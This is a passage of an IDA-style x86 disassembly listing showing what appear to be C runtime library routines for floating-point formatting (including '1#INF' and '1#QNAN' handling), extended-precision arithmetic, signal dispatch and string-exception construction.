dec edi
jmp short loc_42581A
; ---------------------------------------------------------------------------
loc_425818: ; CODE XREF: sub_4254A2+261�j
; sub_4254A2+2BC�j
mov edi, ecx
loc_42581A: ; CODE XREF: sub_4254A2+2DD�j
; sub_4254A2+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_425902
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_425846
cmp [ebp+var_45], 5
jl short loc_42583A
inc [ebp+var_45]
loc_42583A: ; CODE XREF: sub_4254A2+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_425849
; ---------------------------------------------------------------------------
loc_425846: ; CODE XREF: sub_4254A2+38D�j
mov eax, [ebp+var_C]
loc_425849: ; CODE XREF: sub_4254A2+3A2�j
cmp [ebp+var_4], 0
jbe loc_4258F8
loc_425853: ; CODE XREF: sub_4254A2+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_425861
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_425853
; ---------------------------------------------------------------------------
loc_425861: ; CODE XREF: sub_4254A2+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_4253DB
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_425880
neg eax
loc_425880: ; CODE XREF: sub_4254A2+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_42588B
add eax, [ebp+arg_10]
loc_42588B: ; CODE XREF: sub_4254A2+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_425893
sub eax, [ebp+arg_14]
loc_425893: ; CODE XREF: sub_4254A2+3EC�j
cmp eax, 1450h
jle short loc_4258CA
mov [ebp+var_2C], 1
loc_4258A1: ; CODE XREF: sub_4254A2+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_4258AD: ; CODE XREF: sub_4254A2+454�j
; sub_4254A2+45E�j
cmp [ebp+var_2C], 0
jz short loc_425913
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_425928
; ---------------------------------------------------------------------------
loc_4258CA: ; CODE XREF: sub_4254A2+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_4258DA
mov [ebp+var_30], 1
jmp short loc_4258A1
; ---------------------------------------------------------------------------
loc_4258DA: ; CODE XREF: sub_4254A2+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_42600E
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_4258AD
; ---------------------------------------------------------------------------
loc_4258F8: ; CODE XREF: sub_4254A2+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_4258AD
; ---------------------------------------------------------------------------
loc_425902: ; CODE XREF: sub_4254A2+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_425928
; ---------------------------------------------------------------------------
loc_425913: ; CODE XREF: sub_4254A2+40F�j
cmp [ebp+var_30], 0
jz short loc_425928
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_425928: ; CODE XREF: sub_4254A2+426�j
; sub_4254A2+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_4254A2 endp
; ---------------------------------------------------------------------------
off_425943 dd offset loc_42550C ; DATA XREF: sub_4254A2+63�r
dd offset loc_42555B ; jump table for switch statement
dd offset loc_4255B2
dd offset loc_4255DC
dd offset loc_425637
dd offset loc_4256AE
dd offset loc_4256E4
dd offset loc_42572E
dd offset loc_42570D
dd offset loc_425792
dd offset loc_42577C
dd offset loc_425748
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425973 proc near ; CODE XREF: sub_424DF9+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_4259D5
mov byte ptr [ebx+2], 2Dh
jmp short loc_4259D9
; ---------------------------------------------------------------------------
loc_4259D5: ; CODE XREF: sub_425973+5A�j
mov byte ptr [ebx+2], 20h
loc_4259D9: ; CODE XREF: sub_425973+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_4259FF
test edi, edi
jnz short loc_4259FF
cmp [ebp+arg_0], edi
jnz short loc_4259FF
loc_4259EA: ; CODE XREF: sub_425973+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_425BFD
; ---------------------------------------------------------------------------
loc_4259FF: ; CODE XREF: sub_425973+6C�j
; sub_425973+70�j ...
cmp dx, si
jnz short loc_425A7E
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_425A18
cmp [ebp+arg_0], 0
jz short loc_425A27
loc_425A18: ; CODE XREF: sub_425973+9D�j
test edi, 40000000h
jnz short loc_425A27
push offset a1Snan ; "1#SNAN"
jmp short loc_425A6D
; ---------------------------------------------------------------------------
loc_425A27: ; CODE XREF: sub_425973+A3�j
; sub_425973+AB�j
test cx, cx
jz short loc_425A41
cmp edi, 0C0000000h
jnz short loc_425A41
cmp [ebp+arg_0], 0
jnz short loc_425A68
push offset a1Ind ; "1#IND"
jmp short loc_425A50
; ---------------------------------------------------------------------------
loc_425A41: ; CODE XREF: sub_425973+B7�j
; sub_425973+BF�j
cmp edi, eax
jnz short loc_425A68
cmp [ebp+arg_0], 0
jnz short loc_425A68
push offset a1Inf ; "1#INF"
loc_425A50: ; CODE XREF: sub_425973+CC�j
lea eax, [ebx+4]
push eax
call sub_41C890
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_425A5F: ; CODE XREF: sub_425973+109�j
and [ebp+var_4], 0
jmp loc_425BD6
; ---------------------------------------------------------------------------
loc_425A68: ; CODE XREF: sub_425973+C5�j
; sub_425973+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_425A6D: ; CODE XREF: sub_425973+B2�j
lea eax, [ebx+4]
push eax
call sub_41C890
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_425A5F
; ---------------------------------------------------------------------------
loc_425A7E: ; CODE XREF: sub_425973+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_42600E
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_425ADF
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_425DEE
pop ecx
pop ecx
loc_425ADF: ; CODE XREF: sub_425973+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_425AF9
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_425AFC
jmp loc_4259EA
; ---------------------------------------------------------------------------
loc_425AF9: ; CODE XREF: sub_425973+173�j
mov edi, [ebp+arg_C]
loc_425AFC: ; CODE XREF: sub_425973+17F�j
cmp edi, 15h
jle short loc_425B04
push 15h
pop edi
loc_425B04: ; CODE XREF: sub_425973+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_425B1A: ; CODE XREF: sub_425973+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_425380
dec [ebp+arg_14]
pop ecx
jnz short loc_425B1A
test esi, esi
jge short loc_425B44
neg esi
and esi, 0FFh
jle short loc_425B44
loc_425B37: ; CODE XREF: sub_425973+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_4253AE
dec esi
pop ecx
jnz short loc_425B37
loc_425B44: ; CODE XREF: sub_425973+1B8�j
; sub_425973+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_425BA1
mov [ebp+arg_C], ecx
loc_425B54: ; CODE XREF: sub_425973+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_425380
lea eax, [ebp+var_10]
push eax
call sub_425380
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_425322
lea eax, [ebp+var_10]
push eax
call sub_425380
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_425B54
mov eax, [ebp+arg_14]
loc_425BA1: ; CODE XREF: sub_425973+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_425BDE
loc_425BAE: ; CODE XREF: sub_425973+248�j
cmp eax, ecx
jb short loc_425BC1
cmp byte ptr [eax], 39h
jnz short loc_425BBD
mov byte ptr [eax], 30h
dec eax
jmp short loc_425BAE
; ---------------------------------------------------------------------------
loc_425BBD: ; CODE XREF: sub_425973+242�j
cmp eax, ecx
jnb short loc_425BC5
loc_425BC1: ; CODE XREF: sub_425973+23D�j
inc eax
inc word ptr [ebx]
loc_425BC5: ; CODE XREF: sub_425973+24C�j
inc byte ptr [eax]
loc_425BC7: ; CODE XREF: sub_425973+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_425BD6: ; CODE XREF: sub_425973+F0�j
mov eax, [ebp+var_4]
loc_425BD9: ; CODE XREF: sub_425973+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_425BDE: ; CODE XREF: sub_425973+239�j
; sub_425973+275�j
cmp eax, ecx
jb short loc_425BEE
cmp byte ptr [eax], 30h
jnz short loc_425BEA
dec eax
jmp short loc_425BDE
; ---------------------------------------------------------------------------
loc_425BEA: ; CODE XREF: sub_425973+272�j
cmp eax, ecx
jnb short loc_425BC7
loc_425BEE: ; CODE XREF: sub_425973+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_425BFD: ; CODE XREF: sub_425973+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_425BD9
sub_425973 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425C06 proc near ; CODE XREF: sub_422DFC+21DD�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_425C6D
dec eax
dec eax
jz short loc_425C5E
sub eax, 4
jz short loc_425C5E
sub eax, 3
jz short loc_425C5E
sub eax, 4
jz short loc_425C51
sub eax, 6
jz short loc_425C44
dec eax
jz short loc_425C37
or eax, 0FFFFFFFFh
jmp loc_425D2F
; ---------------------------------------------------------------------------
loc_425C37: ; CODE XREF: sub_425C06+27�j
mov esi, dword_4DC004
mov eax, offset dword_4DC004
jmp short loc_425C78
; ---------------------------------------------------------------------------
loc_425C44: ; CODE XREF: sub_425C06+24�j
mov esi, dword_4DC000
mov eax, offset dword_4DC000
jmp short loc_425C78
; ---------------------------------------------------------------------------
loc_425C51: ; CODE XREF: sub_425C06+1F�j
mov esi, dword_4DC008
mov eax, offset dword_4DC008
jmp short loc_425C78
; ---------------------------------------------------------------------------
loc_425C5E: ; CODE XREF: sub_425C06+10�j
; sub_425C06+15�j ...
push edi
call sub_425D33
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_425C78
; ---------------------------------------------------------------------------
loc_425C6D: ; CODE XREF: sub_425C06+C�j
mov esi, dword_4DBFFC
mov eax, offset dword_4DBFFC
loc_425C78: ; CODE XREF: sub_425C06+3C�j
; sub_425C06+49�j ...
cmp esi, 1
jnz short loc_425C84
xor eax, eax
jmp loc_425D2F
; ---------------------------------------------------------------------------
loc_425C84: ; CODE XREF: sub_425C06+75�j
test esi, esi
jnz short loc_425C8F
push 3
call sub_41C1A2
loc_425C8F: ; CODE XREF: sub_425C06+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_425CA1
cmp edi, 0Bh
jz short loc_425CA1
cmp edi, 4
jnz short loc_425CC7
loc_425CA1: ; CODE XREF: sub_425C06+8F�j
; sub_425C06+94�j
mov ebx, dword_4DBE9C
and dword_4DBE9C, 0
cmp edi, ecx
jnz short loc_425CF6
mov edx, dword_43D4CC
mov dword_43D4CC, 8Ch
mov [ebp+arg_0], edx
jmp short loc_425CCA
; ---------------------------------------------------------------------------
loc_425CC7: ; CODE XREF: sub_425C06+99�j
mov ebx, [ebp+arg_0]
loc_425CCA: ; CODE XREF: sub_425C06+BF�j
cmp edi, ecx
jnz short loc_425CF6
mov eax, dword_43D4C0
mov ecx, dword_43D4C4
add ecx, eax
cmp eax, ecx
jge short loc_425CFD
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:43D450h[edx*4]
loc_425CEB: ; CODE XREF: sub_425C06+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_425CEB
jmp short loc_425CFD
; ---------------------------------------------------------------------------
loc_425CF6: ; CODE XREF: sub_425C06+AA�j
; sub_425C06+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_425D0B
loc_425CFD: ; CODE XREF: sub_425C06+D7�j
; sub_425C06+EE�j
push dword_43D4CC
push 8
call esi
pop ecx
pop ecx
jmp short loc_425D19
; ---------------------------------------------------------------------------
loc_425D0B: ; CODE XREF: sub_425C06+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_425D19
cmp edi, 4
jnz short loc_425D2C
loc_425D19: ; CODE XREF: sub_425C06+103�j
; sub_425C06+10C�j
cmp edi, 8
mov dword_4DBE9C, ebx
jnz short loc_425D2C
mov eax, [ebp+arg_0]
mov dword_43D4CC, eax
loc_425D2C: ; CODE XREF: sub_425C06+111�j
; sub_425C06+11C�j
xor eax, eax
pop ebx
loc_425D2F: ; CODE XREF: sub_425C06+2C�j
; sub_425C06+79�j
pop edi
pop esi
pop ebp
retn
sub_425C06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425D33 proc near ; CODE XREF: sub_425C06+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_43D4C8
cmp dword_43D44C, edx
push esi
mov eax, offset dword_43D448
jz short loc_425D61
lea esi, [ecx+ecx*2]
lea esi, ds:43D448h[esi*4]
loc_425D55: ; CODE XREF: sub_425D33+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_425D61
cmp [eax+4], edx
jnz short loc_425D55
loc_425D61: ; CODE XREF: sub_425D33+16�j
; sub_425D33+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43D448h[ecx*4]
cmp eax, ecx
jnb short loc_425D75
cmp [eax+4], edx
jz short locret_425D77
loc_425D75: ; CODE XREF: sub_425D33+3B�j
xor eax, eax
locret_425D77: ; CODE XREF: sub_425D33+40�j
retn
sub_425D33 endp
; =============== S U B R O U T I N E =======================================
sub_425D78 proc near ; CODE XREF: sub_4251BB+8B�p
; sub_4251BB+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword_4DD140
jnb short loc_425DDF
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_4DD040[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_425DDF
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_425DB8
and cl, 7Fh
jmp short loc_425DC5
; ---------------------------------------------------------------------------
loc_425DB8: ; CODE XREF: sub_425D78+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_425DD3
or cl, 80h
loc_425DC5: ; CODE XREF: sub_425D78+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_425DD3: ; CODE XREF: sub_425D78+48�j
mov dword_4DBDDC, 16h
jmp short loc_425DE9
; ---------------------------------------------------------------------------
loc_425DDF: ; CODE XREF: sub_425D78+B�j
; sub_425D78+27�j
mov dword_4DBDDC, 9
loc_425DE9: ; CODE XREF: sub_425D78+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_425D78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425DEE proc near ; CODE XREF: sub_425973+165�p
; sub_42600E+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_425FEE
cmp cx, 7FFFh
jnb loc_425FEE
cmp dx, 0BFFDh
ja loc_425FEE
cmp dx, 3FBFh
ja short loc_425E57
xor eax, eax
jmp short loc_425E91
; ---------------------------------------------------------------------------
loc_425E57: ; CODE XREF: sub_425DEE+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_425E79
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_425E79
xor eax, eax
cmp [esi+4], eax
jnz short loc_425E7B
cmp [esi], eax
jnz short loc_425E7B
jmp loc_425FE8
; ---------------------------------------------------------------------------
loc_425E79: ; CODE XREF: sub_425DEE+71�j
; sub_425DEE+79�j
xor eax, eax
loc_425E7B: ; CODE XREF: sub_425DEE+80�j
; sub_425DEE+84�j
cmp cx, ax
jnz short loc_425E9E
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_425E9E
cmp [ebx+4], eax
jnz short loc_425E9E
cmp [ebx], eax
jnz short loc_425E9E
loc_425E91: ; CODE XREF: sub_425DEE+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_426009
; ---------------------------------------------------------------------------
loc_425E9E: ; CODE XREF: sub_425DEE+90�j
; sub_425DEE+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_425EAE: ; CODE XREF: sub_425DEE+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_425F02
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_425ECA: ; CODE XREF: sub_425DEE+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_425301
add esp, 0Ch
test eax, eax
jz short loc_425EF5
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_425EF5: ; CODE XREF: sub_425DEE+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_425ECA
loc_425F02: ; CODE XREF: sub_425DEE+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_425EAE
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_425F45
loc_425F20: ; CODE XREF: sub_425DEE+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_425F3E
lea eax, [ebp+var_24]
push eax
call sub_425380
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_425F20
loc_425F3E: ; CODE XREF: sub_425DEE+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_425F7E
loc_425F45: ; CODE XREF: sub_425DEE+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_425F7E
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_425F5E: ; CODE XREF: sub_425DEE+184�j
test byte ptr [ebp+var_24], 1
jz short loc_425F67
inc [ebp+var_14]
loc_425F67: ; CODE XREF: sub_425DEE+174�j
lea eax, [ebp+var_24]
push eax
call sub_4253AE
dec ebx
pop ecx
jnz short loc_425F5E
cmp [ebp+var_14], 0
jz short loc_425F7E
or byte ptr [ebp+var_24], 1
loc_425F7E: ; CODE XREF: sub_425DEE+155�j
; sub_425DEE+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_425F95
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_425FCA
loc_425F95: ; CODE XREF: sub_425DEE+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_425FC7
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_425FC2
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_425FBC
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_425FCA
; ---------------------------------------------------------------------------
loc_425FBC: ; CODE XREF: sub_425DEE+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_425FCA
; ---------------------------------------------------------------------------
loc_425FC2: ; CODE XREF: sub_425DEE+1B5�j
inc [ebp+var_20+2]
jmp short loc_425FCA
; ---------------------------------------------------------------------------
loc_425FC7: ; CODE XREF: sub_425DEE+1AB�j
inc [ebp+var_24+2]
loc_425FCA: ; CODE XREF: sub_425DEE+1A5�j
; sub_425DEE+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_425FEE
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_425FE8: ; CODE XREF: sub_425DEE+86�j
mov [esi+0Ah], ax
jmp short loc_426009
; ---------------------------------------------------------------------------
loc_425FEE: ; CODE XREF: sub_425DEE+42�j
; sub_425DEE+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_426009: ; CODE XREF: sub_425DEE+AB�j
; sub_425DEE+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_425DEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42600E proc near ; CODE XREF: sub_4254A2+440�p
; sub_425973+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_43D828
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_426087
jge short loc_426036
mov eax, [ebp+arg_4]
mov ebx, offset dword_43D988
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_426036: ; CODE XREF: sub_42600E+16�j
cmp [ebp+arg_8], ecx
jnz short loc_426041
mov eax, [ebp+arg_0]
mov [eax], cx
loc_426041: ; CODE XREF: sub_42600E+2B�j
cmp [ebp+arg_4], ecx
jz short loc_426087
push esi
push edi
loc_426048: ; CODE XREF: sub_42600E+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_426080
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_426073
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_426073: ; CODE XREF: sub_42600E+57�j
push esi
push [ebp+arg_0]
call sub_425DEE
pop ecx
pop ecx
xor ecx, ecx
loc_426080: ; CODE XREF: sub_42600E+49�j
cmp [ebp+arg_4], ecx
jnz short loc_426048
pop edi
pop esi
loc_426087: ; CODE XREF: sub_42600E+14�j
; sub_42600E+36�j
pop ebx
leave
retn
sub_42600E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_426090 proc near ; CODE XREF: sub_426173+19�p
; sub_42629A+19�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
xor eax, eax
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_41B9C0
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40D9B3
mov eax, esi
pop esi
retn 8
sub_426090 endp
; =============== S U B R O U T I N E =======================================
sub_4260BA proc near ; CODE XREF: sub_4260E2+3�p
; sub_426168+6�j ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427C90
call sub_40D977
mov ecx, esi
pop esi
jmp sub_426564
sub_4260BA endp
; =============== S U B R O U T I N E =======================================
sub_4260D5 proc near ; DATA XREF: .rdata:00427C94�o
; .rdata:00427CA4�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_4260E1
mov eax, offset dword_427688
locret_4260E1: ; CODE XREF: sub_4260D5+5�j
retn
sub_4260D5 endp
; =============== S U B R O U T I N E =======================================
sub_4260E2 proc near ; DATA XREF: .rdata:off_427C90�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4260BA
test [esp+4+arg_0], 1
jz short loc_4260F8
push esi
call sub_41D65F
pop ecx
loc_4260F8: ; CODE XREF: sub_4260E2+D�j
mov eax, esi
pop esi
retn 4
sub_4260E2 endp
; =============== S U B R O U T I N E =======================================
sub_4260FE proc near ; CODE XREF: sub_426173+29�p
mov eax, offset loc_426AE2
call sub_41D640
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_427CAC
call sub_4264DD
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427C90
call sub_4261B0
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_427CA0
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4260FE endp
; =============== S U B R O U T I N E =======================================
sub_42614C proc near ; DATA XREF: .rdata:off_427CA0�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426168
test [esp+4+arg_0], 1
jz short loc_426162
push esi
call sub_41D65F
pop ecx
loc_426162: ; CODE XREF: sub_42614C+D�j
mov eax, esi
pop esi
retn 4
sub_42614C endp
; =============== S U B R O U T I N E =======================================
sub_426168 proc near ; CODE XREF: sub_42614C+3�p
; DATA XREF: .rdata:00428014�o
mov dword ptr [ecx], offset off_427CA0
jmp sub_4260BA
sub_426168 endp
; =============== S U B R O U T I N E =======================================
sub_426173 proc near ; CODE XREF: sub_40D824+13�p
; sub_40D9E8+E�p
mov eax, offset loc_426AF4
call sub_41D640
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-20h]
call sub_426090
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4260FE
push offset dword_428010
lea eax, [ebp-3Ch]
